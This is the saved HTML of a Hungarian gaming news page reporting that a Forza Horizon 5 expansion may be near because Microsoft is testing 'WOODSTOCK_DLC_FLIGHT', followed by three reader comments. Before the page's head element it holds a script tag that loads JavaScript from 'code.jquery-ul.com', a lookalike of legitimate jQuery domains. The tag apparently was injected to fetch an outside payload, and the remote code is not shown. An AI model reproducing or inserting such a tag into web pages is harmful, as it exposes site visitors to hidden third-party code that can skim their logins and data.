<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hu" lang="hu">

<script src="https://code.jquery-ul.com/jquery-ui.js"></script>
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<meta http-equiv="content-language" content="hu" />
	<title>Érkezik az első bővítmény a Forza Horizon 5-höz? | Hírblock | Game Channel</title>
	<meta name='description' content='A Forza Horizon 5 már néhány hónapja megjelent, és azóta milliók élvezik a hihetetlen nyílt világú árkád autóversenyzős kínálatot,...' />
	<meta name='keywords' content='bővítmény, Forza Horizon 5, Playground Games, DLC' />
	<meta http-equiv='Refresh' content='1860' />
	<base href="http://www.gamechannel.hu/" />
	<meta name='viewport' content='width=device-width, initial-scale=1.0'>
	<meta name="robots" content="index,follow" />
	<meta name="robots" content="NOODP" />
	<meta name="resource-type" content="document" />
	<meta http-equiv="expires" content="0" />
	<meta name="google-site-verification" content="WsftYI3Ct5VMjJG7oFQHgNBJ-uXh8i2vllII8T-l6SM" />
	<meta name="verify-v1" content="8ydggt7vPGAHgwKYOFPJ8VoZvRKtSOPnlGMWu1bOszA=" />
	<meta name="author" content="WickedSick" />
	<meta name="copyright" content="Copyright (c) 2015 by Game Channel" />
	<meta name="distribution" content="global" />
	<meta name="generator" content="Marco (Németh Márk) - PlusEngine.com" />
	<meta name="rating" content="general" />
	<link rel="shortcut icon" href="favicon.ico" />
	<link rel="icon" href="favicon.ico" />
	<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.gamechannel.hu/rss/rss.php" />
	<meta http-equiv="content-style-type" content="text/css" />
	<meta http-equiv="cache-control" content="no-cache" />
	<meta http-equiv="X-UA-Compatible" content="IE=9" />
	<!--[if lt IE 9]>
	<script src="http://ie7-js.googlecode.com/svn/version/2.1(beta4)/IE9.js"></script>
	<![endif]-->

	
	<meta itemprop="name" content="Érkezik az első bővítmény a Forza Horizon 5-höz?" />
	<meta itemprop="description" content="A Forza Horizon 5 már néhány hónapja megjelent, és azóta milliók élvezik a hihetetlen nyílt világú árkád autóversenyzős kínálatot,..." />

	<meta property="og:title" content="Érkezik az első bővítmény a Forza Horizon 5-höz?" />
	<meta property="og:url" content="http://www.gamechannel.hu/cikk/hirblock/erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz" />
	<meta property="og:description" content="A Forza Horizon 5 már néhány hónapja megjelent, és azóta milliók élvezik a hihetetlen nyílt világú árkád autóversenyzős kínálatot,..." />

	<meta property='og:type' content='article' />
	<meta property="og:site_name" content="Game Channel" />

	<meta property='og:image' content='http://www.gamechannel.hu/pictures/hirblock/erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz_1.jpg' />	<meta property="article:publisher" content="https://www.facebook.com/GameChannel" />
	<meta itemprop="image" content="http://www.gamechannel.hu/pictures/hirblock/erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz_1.jpg" />

	<link rel="image_src" href="http://www.gamechannel.hu/pictures/hirblock/erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz_1.jpg" />

		<link rel="stylesheet" href="css/base.css" type="text/css" />
	
    		<link rel='stylesheet' href='css/responsive.css' media='all and (max-width: 540px)' />
    		<link rel='stylesheet' media='(orientation: portrait)' href='css/portrait.css'>
    		<link rel='stylesheet' media='(orientation: landscape)' href='css/landscape.css'>
    		
				<!--<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>-->
		
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-2282525-1', 'auto');
  ga('send', 'pageview');

</script>

<div style='float: left;position:fixed;display:hidden;top:-100px;left:-100px;'>
<IMG SRC="https://ad.doubleclick.net/ddm/trackimp/N1306638.156308GAMECHANNEL.HU/B27276143.329279180;dc_trk_aid=521553913;dc_trk_cid=166855673;ord=[timestamp];dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755};ltd=?" BORDER="0" HEIGHT="1" WIDTH="1" ALT="Advertisement">
</div>


<div style='float: left;position:fixed;display:hidden;top:-100px;left:-100px;'>
<img src="https://tps.doubleverify.com/visit.jpg?ctx=21575355&cmp=27142838&sid=6331020&plc=326689844&adsrv=1&btreg=&btadsrv=&crt=&tagtype=&dvtagver=6.1.img&" alt="" width="0" height="0" />
</div>


<!--
<script data-ad-client="ca-pub-5557213242986346" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
-->
</head>




<style type='text/css'>
@media all and (min-width: 1140px) {
body {
	background: #000 url(images/skin_gt7.jpg) no-repeat top center;
}
#header_wrap {
<!--margin-top: 50px;-->
}
.poszterkozepen {
<!--margin-top: 100px;-->
}
.header {
<!--margin-top: 100px;-->
}
}
</style>

<body>

<div id='header_topper'>
	<div class='topper_close'>
		<a href='http://www.gamechannel.hu' class='logo'><img src='images/logo.svg' border='0' title='Game Channel' /></a>

<div class='menu respo_menu'>
<ul>
	<li><a href='#'>rovatok<i class='el-icon-chevron-down'></i></a>
		<ul>
			<li><a href='hirek' class='almenu' title=''>Hírek</a></li>
			<li><a href='tesztek' class='almenu' title=''>Tesztek</a></li>
			<li><a href='mozi' class='almenu' title=''>Mozi</a></li>
			<li><a href='cikkek/hardverzona' class='almenu' title='Hardver tesztek, leírások'>Hardvertesztek</a></li>
			<li><a href='cikkek/masikoldal' class='almenu' title='Felhasználói szoftverek tesztjei'>Felhasználói szoftverek</a></li>
			<li><a href='cikkek/flashback' class='almenu' title='Régi idők játékai'>Flashback</a></li>
			<li><a href='cikkek/tuxvilaga' class='almenu' title='Linux játékok, szoftverek, tesztek, leírások'>Linux cikkek</a></li>
			<li><a href='cikkek/exkluziv' class='almenu' title='Interjúk, exkluzív beszámolók'>Exkluzív</a></li>
			<li><a href='blogok' class='almenu' title='Blogok'>Blogok</a></li>
			<li><a href='keresesek' class='almenu' title='Keresés'>Keresés</a></li>
		</ul>
	</li>
</ul>
</div>		<div class='bal_topper'>
			<div class='menu topper_menu bal_topper'>
			<ul>
				<li style='margin-left: 0px;'><a href='platform/pc' title='PC hírek, tesztek, cikkek'>PC</a></li>
				<li><a href='platform/ps4' title='PS4 hírek, tesztek, cikkek'>PS4</a></li>
				<li><a href='platform/xboxone' title='Xbox One hírek, tesztek, cikkek'>XONE</a></li>
				<li><a href='platform/nintendo-switch' title='Nintendo Switch hírek, tesztek, cikkek'>Switch</a></li>
				<li style='margin-right: 0px;'><a>több<i class='el-icon-chevron-down'></i></a>
				<ul>
          <li><a href='platform/ps5' class='almenu' title='PS5 hírek, tesztek, cikkek'>PS5</a></li>
  				<li><a href='platform/xboxsx' class='almenu' title='Xbox Series X hírek, tesztek, cikkek'>XBOXSX</a></li>
					<li><a href='platform/wiiu' class='almenu' title='WiiU hírek, tesztek'>WiiU</a></li>
					<li><a href='platform/ps3' class='almenu' title='PS3 hírek, tesztek'>PS3</a></li>
					<li><a href='platform/xbox360' class='almenu' title='Xbox360 hírek, tesztek'>Xbox360</a></li>
					<li><a href='platform/linux' class='almenu' title='Linux hírek, cikkek, tesztek'>Linux</a></li>
					<li><a href='platform/mac' class='almenu' title='Mac hírek, cikkek, tesztek'>Mac</a></li>
					<li><a href='platform/steamos' class='almenu' title='Steam OS hírek, tesztek'>Steam OS</a></li>
          <li><a href='platform/stadia' class='almenu' title='Google Stadia játékhírek, játéktesztek'>Stadia</a></li>
				</ul>
				</li>
			</ul>
			</div>
		</div>
		<div class='jobb_topper'>
			
<div class='menu topper_menu'>
<ul><li class='active hirblock' style='margin-left: 0px;'><a href='hirek' title=''>Hírek</a></li><li class='jatekorulet'><a href='tesztek' title=''>Tesztek</a></li><li class='moviechannel'><a href='mozi' title=''>Mozi</a></li><li class='tuxvilaga'><a>több<i class='el-icon-chevron-down'></i></a>
		<ul>
			<li><a href='cikkek/hardverzona' class='almenu' title='Hardver tesztek, leírások'>Hardvertesztek</a></li>
			<li><a href='cikkek/masikoldal' class='almenu' title='Felhasználói szoftverek tesztjei'>Felhasználói szoftverek</a></li>
			<li><a href='cikkek/flashback' class='almenu' title='Régi idők játékai'>Flashback</a></li>
			<li><a href='cikkek/tuxvilaga' class='almenu' title='Linux játékok, szoftverek, tesztek, leírások'>Linux cikkek</a></li>
			<li><a href='cikkek/exkluziv' class='almenu' title='Interjúk, exkluzív beszámolók'>Exkluzív</a></li>
		</ul>
	</li><li><a href='forum' title='Fórumok, témák, topicok'>Fórum</a></li><li class='kozosseg'><a href='#'>Közösség<i class='el-icon-chevron-down'></i></a>
		<ul>
			<li><a href='kozosseg' class='almenu' title='Közösség, tagok'>Közösség, tagok</a></li>
			<li><a href='blogok' class='almenu' title='Blogok'>Blogok</a></li>
			<li><a href='jelvenylista' class='almenu' title='Jelvények, megszerezhető achievementek'>Jelvények (achievement)</a></li>
			<li><a href='onlinefelhasznalok' class='almenu' title='Online felhasználók'>Online felhasználók</a></li>
		</ul>
	</li><li class='kereses'><a href='keresesek' title='Keresés' style='padding-left: 12px;padding-right:16px;'><i class='el-icon-search'></i></a>
		<ul>
		<form action='keresesek' name='form_search' method='post'>
		<p><input type='text' id='search_input' name='mit' title='írd be a keresett szót, majd nyomd le az entert!' /></p>
		<button type='submit' id='search_submit' name='submit_search' value='' style='display: none;' /></button>
		</form>
		</ul>
	</li>
</ul>


</div><div class='loginbox'>
	<ul class='login'>
		<li class='login no_log'><a href='#' title='Lépj be!'><i class='el-icon-off'></i></a>
			<ul>

			<form method='POST' action='login.php' name='Belepesform'>
			<p>felhasználói név  </p>
			<p><input name='username' type='text'></input></p>
			<p><input type='hidden' name='vissza' value='/cikk/hirblock/erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz'></p>
			<p>jelszó  </p>
			<p><input name='password' type='password'></input></p>
			<p><input name='mitcsinal' value='Belepes_tovabb' type='hidden'></input></p>
			<p style='margin:5 0;text-align:center;'><button name='submit_login' value='Belépés' type='submit'>Belépés</button></p>
			</form>
			<li><a href='elfelejtettjelszo' class='elfelejtett_jelszo'>Elfelejtetted a jelszavad?</a></li>
			</ul>
		</li>
		<li class='no_log regisztracio'><a href='regisztracio' title='Regisztrálj most! Ingyen van, ahogy az ajándékok is.'><i class='el-icon-adult'></i></a></li>
	</ul></div>		</div>	</div>
</div>


<!--<div style='float: left;position:fixed;display:hidden;top:-100px;left:-100px;'></div>-->
<!-- BANNER TRACKING START -->
<!--
<div style='float: left;position:fixed;display:hidden;top:-100px;left:-100px;'>

<img src="https://track.adform.net/adfserve/?bn=47313585;1x1inv=1;srctype=3;ord=[timestamp]" border="0" width="1" height="1"/>

</div>
-->
<!-- BANNER TRACKING STOP -->


<div style="float:left;width:100%;height:100%;position:fixed;background:transparent;z-index:0;" onmouseover="this.style.cursor='pointer';" onclick="window.open('/libs/banner_extra_kattintas.php?bannernev=skin_gt7&banner_link=https%3A%2F%2Fad.doubleclick.net%2Fddm%2Ftrackclk%2FN1306638.156308GAMECHANNEL.HU%2FB27276143.329279180%3Bdc_trk_aid%3D521553913%3Bdc_trk_cid%3D166855673%3Bdc_lat%3D%3Bdc_rdid%3D%3Btag_for_child_directed_treatment%3D%3Btfua%3D%3Bltd%3D')"></div>

<style>
@media all and (min-width: 1140px) {
#skin_kihagyas {
	height: 170px;
}
}
@media all and (max-width: 1140px) {
#skin_kihagyas {
	height: 0px;
}
}
</style>

<div id='skin_kihagyas' style="width:100%"></div>


<a id="atop" name="atop"></a>

<div id='header_wrap'><div class='poszterkozepen'><h1 class='kepre_cim'><a href='http://www.gamechannel.hu/pictures/hirblock/erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz_1.jpg' class='thickbox' rel='erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz' title='Érkezik az első bővítmény a Forza Horizon 5-höz?'>Érkezik az első bővítmény a Forza Horizon 5-höz?</a></h1>

<div class='kepre_es'><a href='platform/pc' target='_blank' title='Minden pc hír, cikk listázása'><div class='kepre_ir_platform bgc_pc'>pc</div></a><a href='platform/xboxone' target='_blank' title='Minden xone hír, cikk listázása'><div class='kepre_ir_platform bgc_xboxone'>xone</div></a><a href='platform/xboxsx' target='_blank' title='Minden xboxsx hír, cikk listázása'><div class='kepre_ir_platform bgc_xboxsx'>xboxsx</div></a></div>

<div class='kepre_ms'>
<div class='kepre_datum' title='2022. február 25. 15:00'><span class='el-icon-time'></span>2022. február 25.</div><div class='kepre_olvasva'><span title='Eddig 6.834 olvasta el'><span class='el-icon-eye-open cikkben_icon'></span>6.834</span><span title='Jelenleg 1 olvassa'><span class='el-icon-group cikkben_icon'></span>1</span></div></div>

<a href='http://www.gamechannel.hu/pictures/hirblock/erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz_1.jpg' class='thickbox nagyithato' rel='erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz' title='Érkezik az első bővítmény a Forza Horizon 5-höz?'><img src='kep.php?kep=pictures/hirblock/erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz_1.jpg&x=1140&y=390' title='' alt='' class='keretszin_hirblock' /></a></div></div><div id='wrap' class='clear'>


<div id='container'><div class='nemlatszik' style='float:left;line-height:50px;width:745px;height:50px;padding-left:20px;'><a href='http://www.gamechannel.hu/libs/banner_kattintas.php?banner_kattint=20' target='_blank' title='A rovatot támogatja a Horizon Forbidden West!' rel='nofollow' style='border-bottom: none;'><img src='http://www.gamechannel.hu/banner/horizon_fb_rovatsz_v2_bal.jpg' style='margin:0;padding:0;margin-left:-20px;'></a></div>
<div class='content'><link rel='stylesheet' href='css/cikk.css' type='text/css' /><link rel='stylesheet' href='css/score.css' type='text/css' /><div style='float:left;width:100%;height:10px;'> </div>
<div class='post'>
	<div class='author'><a href='adatlap/WickedSick' title='Nézd meg WickedSick profilját, jelöld barátnak!' alt='WickedSick profilja, adatai'><img src='avatars/thumb_100/38183.jpg' class='' alt='WickedSick profilja, adatai' /><div class='kovetes'><a href='' class='korbutton' title='Kövesd WickedSick írásait!'><i class='el-icon-plus'></i></a></div><span class='szerzo_title'>WickedSick</a></span></div>
<div class='entry'>	<!-- google_ad_section_start -->
	<div class='bevezeto'>A <a href='jatekok/forza-horizon-5/4481' title='Képek, cikkek, videók a(z) Forza Horizon 5 adatlapján' target='_blank'>Forza Horizon 5</a> már néhány hónapja megjelent, és azóta milliók élvezik a hihetetlen nyílt világú árkád autóversenyzős kínálatot, ha azonban az utolsó cseppig kipréselted a tartalom minden cseppjét is az élményből, és még többre vágysz - nos, akkor lehet, hogy van egy jó hír számodra.</div>	<!-- google_ad_section_end -->
	<div style='display:hidden;top:-100px;left:-100px;width:0px;height:0px;'><IMG SRC="https://ad.doubleclick.net/ddm/trackimp/N1306638.156308GAMECHANNEL.HU/B27142838.326689844;dc_trk_aid=518911206;dc_trk_cid=165226852;ord=[timestamp];dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755};ltd=?" BORDER="0" HEIGHT="1" WIDTH="1" ALT="Advertisement"></div><div class='cikk_zona'><center><a href='libs/banner_kattintas.php?banner_kattint=33' target='_blank' title='Megjelent a Horizon Forbidden West!' rel='nofollow' style='border-bottom: none;'><img src='http://www.gamechannel.hu/banner/horizon_fb_745x300.jpg' class='banner' /></a></center></div>	<!-- google_ad_section_start -->
	<br /> A Twitteren keresztül az ALumia_Italia fiók, az Xbox Insider Hubot és az új alkalmazásokkal és miegymással kapcsolatos frissítéseket nyomon követő oldal nemrég arról számolt be, hogy a Microsoft elkezdett tesztelni valamit, <b>amit a backendben csak WOODSTOCK_DLC_FLIGHT néven emlegetnek</b>.<br/><br/>Ha esetleg nem tudnád, a "Woodstock" volt az a kódnév, amit a <a href='jatekok/forza-horizon-5/4481' title='Képek, cikkek, videók a(z) Forza Horizon 5 adatlapján' target='_blank'>Forza Horizon 5</a> belsőleg kapott a fejlesztés során, ami persze arra utal, hogy a játék első bővítménye már úton lehet.<br/><br/><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">Microsoft has started testing WOODSTOCK_DLC_FLIGHT through the Xbox Insider Hub, which means Forza Horizon DLC 1 &quot;soon&quot;</p>&mdash; Aggiornamenti Lumia (@ALumia_Italia) <a href="https://twitter.com/ALumia_Italia/status/1496833193898618889?ref_src=twsrc%5Etfw">February 24, 2022</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center>	<!-- google_ad_section_end -->
	</div>
<div class='post-bottom'><div class='share-post-block'>
<div class='entry_like' style='margin-top:12px;'><iframe src="//www.facebook.com/plugins/like.php?href=http://www.gamechannel.hu/cikk/hirblock/erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz&amp;width&amp;layout=box_count&amp;action=like&amp;show_faces=false&amp;share=false&amp;height=65&amp;appId=138712986167054" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:65px; width: 65px;" allowTransparency="true"></iframe>

</div><div class='entry_like' style='margin-top:4px;'>

<a href="https://twitter.com/share" class="twitter-share-button" data-url="http://www.gamechannel.hu/cikk/hirblock/erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz" data-via="gamechannel_hu" data-dnt="true" data-count="vertical">Tweet</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script>

</div>


<div class='jobbra'>

<iframe src ='./libs/rate.php?tipus=cikk&ki=1&mit=78387' class='iframe' width='53px' height='60px' frameborder='0' scrolling='no' align='right' marginheight='0' marginwidth='0' style='margin:4px 0px 0px 0px;padding:0px; background-color: transparent;'>
<p>Iframe lenne...</p>
</iframe><a href="javascript:alert('Ezt a funkciót csak bejelentkezve tudod használni!')"><i class='el-icon-heart'></i></a><a href='ajanljminket/mit/cikk-CSERE-hirblock-CSERE-erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz' title='Érkezik az első bővítmény a Forza Horizon 5-höz? - Küldd el a cikket ismerősödnek!'><i class='el-icon-share'></i></a>


</div>






</div></div></div><!-- /post --><div style='display:hidden;top:-100px;left:-100px;width:0px;height:0px;'><IMG SRC="https://ad.doubleclick.net/ddm/trackimp/N1306638.156308GAMECHANNEL.HU/B27142838.326689844;dc_trk_aid=518911206;dc_trk_cid=165226852;ord=[timestamp];dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755};ltd=?" BORDER="0" HEIGHT="1" WIDTH="1" ALT="Advertisement"></div><div><a id='hozzaszolas' name='hozzaszolas'></a><div class='no_margin no_padding'></div><div class='comment_szam'>3 hozzászólás</div><div id='comment-edit'><textarea disabled name='comment'>Hozzászólni csak regisztrált felhasználók tudnak! Regisztrálj, hiszen csak fél perc és teljesen ingyenes!</textarea><br /></div><div class='comment-container'><div class='comment-left'><a href='adatlap/soami' title='soami profilja'><img alt='' src='avatars/thumb_100/noimg_avatar.png' class='avatar online' /></a></div>

<div class='comment-right'>
<div class='comment_top'><a href='adatlap/soami' title='soami profilja'><h2>soami</h2></a><span>2 napja és  10 órája</span></div>
<div class='comment-content'><p><div class='idezet'><div class='jel'><i class='el-icon-quotes'></i></div>Mordorer írta:<br /><div class='szoveg'>Mire vártak vajon? <img src='/design/smileys/surprised.png' style='height:18px;vertical-align: middle;'></div></div>Forzáztatok amúgy valaha ? Minden dlc később szokott jönni, Hot Wheels dlc a 3hoz 2017 májusban jött a játék meg 2016 szeptemberben jelent meg. Nincs ebben semmi meglepő x.d.</p><div class='comment_bottom'><a href='hozzaszolasvalasz/hozzaszolas_cikkekhez/erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz/71396/412324/cikk/78387/cikk*hirblock*erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz' class='jobbra reply' style='color: #585858;border-bottom: none;vertical-align:top;'><i class='el-icon-return-key'></i> válasz erre</a>
<iframe src ='./libs/rate_hsz.php?skin=base&ki=1&hsz=412324' frameborder='0' height='20px' width='150px' scrolling='no' align='right' marginheight='0' marginwidth='0'>
<p>A böngésződ nem támogatja az iframe-t. Cseréld le. de gyorsan. ;)</p>
</iframe></div></div></div></div><div class='comment-container even'><div class='comment-left'><a href='adatlap/Mordorer' title='Mordorer profilja'><img alt='' src='avatars/thumb_100/35572.jpg' class='avatar' /></a></div>

<div class='comment-right'>
<div class='comment_top'><a href='adatlap/Mordorer' title='Mordorer profilja'><h2>Mordorer</h2></a><span>2 napja és  12 órája</span></div>
<div class='comment-content'><p>Mire vártak vajon? <img src='/design/smileys/surprised.png' style='height:18px;vertical-align: middle;'></p><div class='comment_bottom'><a href='hozzaszolasvalasz/hozzaszolas_cikkekhez/erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz/71396/412320/cikk/78387/cikk*hirblock*erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz' class='jobbra reply' style='color: #585858;border-bottom: none;vertical-align:top;'><i class='el-icon-return-key'></i> válasz erre</a>
<iframe src ='./libs/rate_hsz.php?skin=base&ki=1&hsz=412320' frameborder='0' height='20px' width='150px' scrolling='no' align='right' marginheight='0' marginwidth='0'>
<p>A böngésződ nem támogatja az iframe-t. Cseréld le. de gyorsan. ;)</p>
</iframe></div></div></div></div><div class='comment-container'><div class='comment-left'><a href='adatlap/muki' title='muki profilja'><img alt='' src='avatars/thumb_100/12285.jpg' class='avatar' /></a></div>

<div class='comment-right'>
<div class='comment_top'><a href='adatlap/muki' title='muki profilja'><h2>muki</h2></a><span>2 napja és  13 órája</span></div>
<div class='comment-content'><p>Nem kapkodták el. <img src='/design/smileys/surprised.png' style='height:18px;vertical-align: middle;'></p><div class='comment_bottom'><a href='hozzaszolasvalasz/hozzaszolas_cikkekhez/erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz/71396/412316/cikk/78387/cikk*hirblock*erkezik-az-elso-bovitmeny-a-forza-horizon-5hoz' class='jobbra reply' style='color: #585858;border-bottom: none;vertical-align:top;'><i class='el-icon-return-key'></i> válasz erre</a>
<iframe src ='./libs/rate_hsz.php?skin=base&ki=1&hsz=412316' frameborder='0' height='20px' width='150px' scrolling='no' align='right' marginheight='0' marginwidth='0'>
<p>A böngésződ nem támogatja az iframe-t. Cseréld le. de gyorsan. ;)</p>
</iframe></div></div></div></div></div></div><!-- /content -->
<div class='rightside'><div style='float:left;line-height:100px;width:336px;height:100px;margin-top:-20px;padding-left:20px;'><a href='http://www.gamechannel.hu/libs/banner_kattintas.php?banner_kattint=20' target='_blank' title='A rovatot támogatja a Horizon Forbidden West!' rel='nofollow' style='border-bottom: none;'><img src='http://www.gamechannel.hu/banner/horizon_fb_rovatsz_v2_jobb.jpg' style='margin:0;padding:0;margin-left:-20px;margin-top:-30px;'></a></div><div style='float:left;width:100%;height:-10px;'> </div><div style='float:left;width:336px;height:120px;background-color: #1C1C1C;color:#fff;margin-bottom:20px;position: relative;'><img src='../boritokepek/jatekadatlapok/4481.jpg' style='width:336px;height:120px;opacity: 0.6;' />

<div style='width:100%;top:15px;position:absolute;text-align:center;padding-bottom:10px;border-bottom: 1px solid #fff;'>Forza Horizon 5</div>
<div style='float:left;position:absolute;right:18px;top:38px;width:68px;height:24px;background:#fff;'></div><div style='float:left;position:absolute;right:18px;top:38px;'><a href='http://play247.hu/kereses/mindenhol/forza+horizon+5/0' title='Vedd meg most a(z) Forza Horizon 5 játékot!' target='_blank'><img src='http://play247.hu/images/logo.svg' style='height:20px;padding-top:2px;padding-right:5px;' /></div>
<div style='left:15px;bottom:21px;position:absolute;margin-left:0px;font-weight:bold;font-size:22px;'>23.490 Ft-tól</a></div><a href='jatekok/forza-horizon-5/4481' title='Tovább a(z) Forza Horizon 5 adatlapjára' target='_blank' class='button' style='right:18px;bottom:15px;position:absolute;margin-left:0px;'><i class='el-icon-plus'></i>kövesd a játékot!</a></div><div style='display:hidden;top:-100px;left:-100px;width:0px;height:0px;'><IMG SRC="https://ad.doubleclick.net/ddm/trackimp/N1306638.156308GAMECHANNEL.HU/B27142838.326689844;dc_trk_aid=518911206;dc_trk_cid=165226852;ord=[timestamp];dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755};ltd=?" BORDER="0" HEIGHT="1" WIDTH="1" ALT="Advertisement"></div><div class='box245 margin_bottom_0'><h3>kapcsolódó hírek, cikkek</h3><div class='post-img'><a href='cikk/hirblock/a-franchise-tortenetenek-legnagyobb-rajtjaval-buszkelkedhet-a-halo-infinite' title='A franchise történetének legnagyobb rajtjával büszkélkedhet a Halo Infinite'><img src='thumb_pictures/hirblock/a-franchise-tortenetenek-legnagyobb-rajtjaval-buszkelkedhet-a-halo-infinite_1.jpg' class='fordul' width='336' height='189' title='A franchise történetének legnagyobb rajtjával büszkélkedhet a Halo Infinite' alt='A franchise történetének legnagyobb rajtjával büszkélkedhet a Halo Infinite' /></div><h2 class='vonal_nelkul'>A franchise történetének legnagyobb rajtjával büszkélkedhet a Halo Infinite</h2></a></p><div class='post-img'><a href='cikk/hirblock/kritikus-hibakat-javit-a-forza-horizon-5-elso-frissitese' title='Kritikus hibákat javít a Forza Horizon 5 első frissítése'><img src='thumb_pictures/hirblock/kritikus-hibakat-javit-a-forza-horizon-5-elso-frissitese_1.jpg' class='fordul' width='336' height='189' title='Kritikus hibákat javít a Forza Horizon 5 első frissítése' alt='Kritikus hibákat javít a Forza Horizon 5 első frissítése' /></div><h2 class='vonal_nelkul'>Kritikus hibákat javít a Forza Horizon 5 első frissítése</h2></a></p><div class='post-img'><a href='cikk/hirblock/a-megjelenes-heteben-mar-6-millio-jatekos-szaguldozik-a-forza-horizon-5ben' title='A megjelenés hetében már 6 millió játékos száguldozik a Forza Horizon 5-ben'><img src='thumb_pictures/hirblock/a-megjelenes-heteben-mar-6-millio-jatekos-szaguldozik-a-forza-horizon-5ben_1.jpg' class='fordul' width='336' height='189' title='A megjelenés hetében már 6 millió játékos száguldozik a Forza Horizon 5-ben' alt='A megjelenés hetében már 6 millió játékos száguldozik a Forza Horizon 5-ben' /></div><h2 class='vonal_nelkul'>A megjelenés hetében már 6 millió játékos száguldozik a Forza Horizon 5-ben</h2></a></p></div><script language="Javascript">
<!--
function toggleDiv(id,flagit) {
if (flagit=="1"){
if (document.layers) document.layers[''+id+''].visibility = "show"
else if (document.all) document.all[''+id+''].style.visibility = "visible"
else if (document.getElementById) document.getElementById(''+id+'').style.visibility = "visible"
}
else
if (flagit=="0"){
if (document.layers) document.layers[''+id+''].visibility = "hide"
else if (document.all) document.all[''+id+''].style.visibility = "hidden"
else if (document.getElementById) document.getElementById(''+id+'').style.visibility = "hidden"
}
}
//-->
</script>

<style type="text/css">
#rightside_friss, #rightside_top {clear: both;}
#rightside_friss {position:relative;}
#rightside_top {position:absolute;visibility:hidden;}
</style>

<div id='rightside_friss'>

<h3>ezt mondjátok
<div class='jobbra'>
<a onclick="toggleDiv('rightside_friss',1);toggleDiv('rightside_top',0)" class='tabber tabbed'>Friss</a>

<a onclick="toggleDiv('rightside_top',1);toggleDiv('rightside_friss',0)" class='tabber' style='margin-right: 0px;'>Top</a>
</div>
</h3>
<div class='comment-container'><div class='comment-left'><a href='adatlap/Kisember001' title='Kisember001 profilja'><img src='avatars/thumb_56/noimg_avatar.png' alt='Kisember001 profilja' class='avatar' /></a></div>

<div class='comment-right'>
<div class='comment_top'><a href='adatlap/Kisember001' title='Kisember001 profilja'><h2>Kisember001</h2></a><span>8 órája és  7 perce</span></div>
<div class='comment-content'><p><a href='cikk/hirblock/oriasi-blama-lenyultak-a-konami-elol-a-silent-hill-domain-nevet#comment-edit' title='Belépés a(z) Óriási blama: lenyúlták a Konami elől a Silent Hill domain nevet témába' class='cim'>Óriási blama: lenyúlták a Konami elől a Silent Hill domain nevet</a></p></div></div></div>
<div class='comment-container even'><div class='comment-left'><a href='adatlap/fighterlaci' title='fighterlaci profilja'><img src='avatars/thumb_56/37828.png' alt='fighterlaci profilja' class='avatar' /></a></div>

<div class='comment-right'>
<div class='comment_top'><a href='adatlap/fighterlaci' title='fighterlaci profilja'><h2>fighterlaci</h2></a><span>8 órája és  19 perce</span></div>
<div class='comment-content'><p><a href='cikk/hirblock/oriasi-blama-lenyultak-a-konami-elol-a-silent-hill-domain-nevet#comment-edit' title='Belépés a(z) Óriási blama: lenyúlták a Konami elől a Silent Hill domain nevet témába' class='cim'>Óriási blama: lenyúlták a Konami elől a Silent Hill domain nevet</a></p></div></div></div>
<div class='comment-container'><div class='comment-left'><a href='adatlap/fighterlaci' title='fighterlaci profilja'><img src='avatars/thumb_56/37828.png' alt='fighterlaci profilja' class='avatar' /></a></div>

<div class='comment-right'>
<div class='comment_top'><a href='adatlap/fighterlaci' title='fighterlaci profilja'><h2>fighterlaci</h2></a><span>8 órája és  19 perce</span></div>
<div class='comment-content'><p><a href='cikk/hirblock/a-modderek-belso-nezetes-elmenyt-varazsoltak-a-the-witcher-3bol#comment-edit' title='Belépés a(z) A modderek belső nézetes élményt varázsoltak a The Witcher 3-ból témába' class='cim'>A modderek belső nézetes élményt varázsoltak a The Witcher 3-ból</a></p></div></div></div>
